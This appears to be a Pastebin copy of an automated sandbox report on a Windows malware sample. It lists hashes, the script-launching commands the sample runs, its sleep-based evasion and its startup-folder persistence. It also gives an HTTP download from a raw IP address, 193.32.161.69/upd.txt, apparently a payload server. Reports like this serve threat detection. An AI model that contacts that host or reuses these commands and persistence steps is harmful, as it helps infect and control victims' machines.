Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: ""
- * MalScore: 7.3999999999999995
- * File Name: "Exes_1eb383c0cb6f534e113975efea309511.exe"
- * File Size: 2029568
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "741f2e08c27a104048826a2f04e46cc91f77e6cfdc06f0f818543c84f9e97560"
- * MD5: "1eb383c0cb6f534e113975efea309511"
- * SHA1: "cf409275f6ad0e738971445e44c765be3b5449d1"
- * SHA512: "6e485c4b3bd34c9f60a4174eb881874de5da5f43cefcae894cb7952f4ebcec54f7719ed5a51f487421c66e0e573b5ac52733da5cb7558f3ef0cd7339dcae2858"
- * CRC32: "1D223699"
- * SSDEEP: "49152:iaiOFjnvV6ISfYo+U6/Xw9zBUS1ijMpydJvAgwtDfnEId:WaJhSSUr8jlJ4gwlfnEe"
- * Process Execution:
- "Exes_1eb383c0cb6f534e113975efea309511.exe",
- "notepad.exe",
- "cmd.exe",
- "wscript.exe",
- "notepad.exe"
- * Executed Commands:
- "\"C:\\Windows\\notepad.exe\" -c \"C:\\ProgramData\\FtqBnjJnmF\\cfgi\"",
- "cmd.exe /C WScript \"C:\\ProgramData\\FtqBnjJnmF\\r.vbs\"",
- "\"C:\\Windows\\notepad.exe\" -c \"C:\\ProgramData\\FtqBnjJnmF\\cfg\"",
- "C:\\Windows\\system32\\wscript.exe WScript \"C:\\ProgramData\\FtqBnjJnmF\\r.vbs\""
- * Signatures Detected:
- "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
- "Details":
- "IP": "193.32.161.69:5555"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details":
- "Window": "WSH-Timer"
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "Exes_1eb383c0cb6f534e113975efea309511.exe tried to sleep 299 seconds, actually delayed analysis time by 0 seconds"
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details":
- "ioc": "2.86"
- "ioc": "0.34"
- "ioc": "7.9."
- "ioc": "..17"
- "ioc": "..70"
- "ioc": "4.32."
- "ioc": "9.86"
- "ioc": "3.21"
- "ioc": "78.11"
- "ioc": "0..35"
- "ioc": "-.8677"
- "ioc": "1.47"
- "ioc": "80.25."
- "ioc": "2.130"
- "ioc": "4.89"
- "ioc": "-.01."
- "ioc": "8..879"
- "ioc": "..31"
- "ioc": "6.948"
- "ioc": "..47-"
- "ioc": "1.519"
- "ioc": "1.51"
- "ioc": "58.43"
- "ioc": "4.05"
- "ioc": "7.51"
- "ioc": "4.86"
- "ioc": "6..1"
- "ioc": "7.36"
- "ioc": "7.58"
- "ioc": "6.78"
- "ioc": "2.097"
- "ioc": "1.64"
- "ioc": "03.58"
- "ioc": "6.97"
- "ioc": "74.52"
- "ioc": "0.773"
- "ioc": "9.07"
- "ioc": "05.27"
- "ioc": "9.45"
- "ioc": "1.07"
- "ioc": "85.83"
- "ioc": "1.0799"
- "ioc": "7.663"
- "ioc": "-.61"
- "ioc": "2.23"
- "ioc": "0.276"
- "ioc": "8.72"
- "ioc": "4.66"
- "ioc": "44.29"
- "ioc": "4-.47"
- "ioc": "20.272"
- "ioc": "7.82"
- "ioc": "4.9."
- "ioc": "3.945"
- "ioc": "1.01"
- "ioc": "4.42"
- "ioc": "0.09"
- "ioc": "41.89/"
- "ioc": "9.96"
- "ioc": "6.15"
- "ioc": "4.08"
- "ioc": "94.93"
- "ioc": "8.82"
- "ioc": ".-.80"
- "ioc": "3.47"
- "ioc": "9..7"
- "ioc": "..87"
- "ioc": "74.85"
- "ioc": "3.35"
- "ioc": "3.05"
- "ioc": "..995"
- "ioc": "-.20"
- "ioc": "9.66"
- "ioc": "6.79"
- "ioc": "2.7.6"
- "ioc": "-.85"
- "ioc": "6.01"
- "ioc": "6.00"
- "ioc": "7.46"
- "ioc": "4-.43"
- "ioc": "1.06"
- "ioc": "vape.pdb"
- "ioc": "fidapuv.pdb"
- "ioc": "32.dll"
- "ioc": "1.2k2u2"
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details":
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: Exes_1eb383c0cb6f534e113975efea309511.exe, pid: 1448, offset: 0x00000000, length: 0x001ef000"
- "self_read": "process: wscript.exe, pid: 1880, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: wscript.exe, pid: 1880, offset: 0x000000f0, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1880, offset: 0x000001e8, length: 0x00000078"
- "self_read": "process: wscript.exe, pid: 1880, offset: 0x00018000, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 1880, offset: 0x00018058, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1880, offset: 0x000181a8, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1880, offset: 0x00018470, length: 0x00000010"
- "self_read": "process: wscript.exe, pid: 1880, offset: 0x00018640, length: 0x00000012"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Exes_1eb383c0cb6f534e113975efea309511.exe -> cmd.exe /C WScript \"C:\\ProgramData\\FtqBnjJnmF\\r.vbs\""
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://193.32.161.69/upd.txt"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://193.32.161.69/upd.txt"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ftUPeSPdpA.url"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ftUPeSPdpA.url"
- * Started Service:
- * Mutexes:
- "718925f232b7f837a482"
- * Modified Files:
- "C:\\ProgramData\\FtqBnjJnmF\\windrv32.exe",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ftUPeSPdpA.url"
- * Deleted Files:
- "C:\\ProgramData\\FtqBnjJnmF\\r.vbs",
- "C:\\ProgramData\\FtqBnjJnmF\\windrv32.exe",
- "C:\\ProgramData\\FtqBnjJnmF\\windrv32"
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- * Domains:
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.69/upd.txt",
- "user-agent": "WinInetGet/0.1",
- "method": "GET",
- "host": "193.32.161.69",
- "version": "1.1",
- "path": "/upd.txt",
- "data": "GET /upd.txt HTTP/1.1\r\nAccept: text/*, application/exe, application/zlib, application/gzip, application/applefile\r\nUser-Agent: WinInetGet/0.1\r\nHost: 193.32.161.69\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment